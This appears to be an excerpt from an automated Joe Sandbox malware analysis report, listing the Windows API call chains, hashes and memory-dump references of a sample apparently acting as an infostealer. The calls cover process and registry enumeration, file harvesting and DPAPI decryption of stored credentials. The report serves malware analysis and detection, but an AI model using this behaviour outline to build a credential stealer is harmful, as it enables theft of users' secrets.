                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                                                                                                                                                                                                        • String ID: E.A
                                                                                                                                                                                                                                                                                        • API String ID: 1035121393-2211245587
                                                                                                                                                                                                                                                                                        • Opcode ID: 8b033d71a75b0a659c9550832104cb48f202312a58c6f872a4bc729aaadf1e74
                                                                                                                                                                                                                                                                                        • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b033d71a75b0a659c9550832104cb48f202312a58c6f872a4bc729aaadf1e74
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,04406088), ref: 0040971B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                                                                          • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                                                                          • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                                                                        • memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                                                                          • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                                                                          • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                                                                          • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                                                        • String ID: $DPAPI
                                                                                                                                                                                                                                                                                        • API String ID: 2647593125-1819349886
                                                                                                                                                                                                                                                                                        • Opcode ID: 20fedc1595b1d14bfbc67299ff3f27808ad2d0836df1b2d3d14e3d80815450fd
                                                                                                                                                                                                                                                                                        • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20fedc1595b1d14bfbc67299ff3f27808ad2d0836df1b2d3d14e3d80815450fd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3491751439-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 663210355256c1a79006bc930096bf3c730480ad8148fdf9ee136a6da0e86fe2
                                                                                                                                                                                                                                                                                        • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 663210355256c1a79006bc930096bf3c730480ad8148fdf9ee136a6da0e86fe2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                                                        • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,04402B50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,?,04402B50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 941982115-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                                                                        • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: Pi@
                                                                                                                                                                                                                                                                                        • API String ID: 0-1360946908
                                                                                                                                                                                                                                                                                        • Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                                                                                        • Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                                                                                        • String ID: <
                                                                                                                                                                                                                                                                                        • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                                                                                        • Opcode ID: 85c67f99e022b53bf17435a6d7f42a962d884bf02f2d202c56b95b99adfd8f66
                                                                                                                                                                                                                                                                                        • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85c67f99e022b53bf17435a6d7f42a962d884bf02f2d202c56b95b99adfd8f66
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,044038F0), ref: 0040EFCE
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04403650), ref: 0040F06F
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04403570), ref: 0040F17E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3722407311-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3a96b665b3cbcbf55da3d0258d3f7f573c41df7ba93c0507f9044406bed029a1
                                                                                                                                                                                                                                                                                        • Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a96b665b3cbcbf55da3d0258d3f7f573c41df7ba93c0507f9044406bed029a1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,044038F0), ref: 0040EFCE
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04403650), ref: 0040F06F
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04403570), ref: 0040F17E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3722407311-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 31357a372ffa8051568a26c3519af1ef57e737c077d660d25448396aefe02b83
                                                                                                                                                                                                                                                                                        • Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31357a372ffa8051568a26c3519af1ef57e737c077d660d25448396aefe02b83
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0041281A
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406A98), ref: 00412838
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,044036B0), ref: 0041269B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                        • String ID: 00A
                                                                                                                                                                                                                                                                                        • API String ID: 2104210347-95910775
                                                                                                                                                                                                                                                                                        • Opcode ID: 0059c6a1cdbce71a941e6102a03021f307d23a853d510470ca8830f04c47ea2b
                                                                                                                                                                                                                                                                                        • Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0059c6a1cdbce71a941e6102a03021f307d23a853d510470ca8830f04c47ea2b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9
                                                                                                                                                                                                                                                                                        Uniqueness

